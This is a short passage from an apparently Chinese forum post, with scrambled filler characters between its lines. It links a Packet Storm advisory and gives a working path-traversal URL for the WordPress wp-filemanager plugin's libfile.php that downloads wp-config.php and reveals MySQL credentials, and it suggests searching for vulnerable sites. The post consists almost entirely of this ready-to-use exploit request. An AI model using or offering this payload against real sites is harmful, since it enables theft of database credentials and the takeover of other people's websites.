洞详解:http://packetstormsecurity.com/f ... -File-Download.html
- V$ g9 S, j2 o) a 8 H) ~" ]7 P ~, l8 u! g* ?- C; _
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
2 U, M/ f- x7 m, D9 r" m: m/ l& w |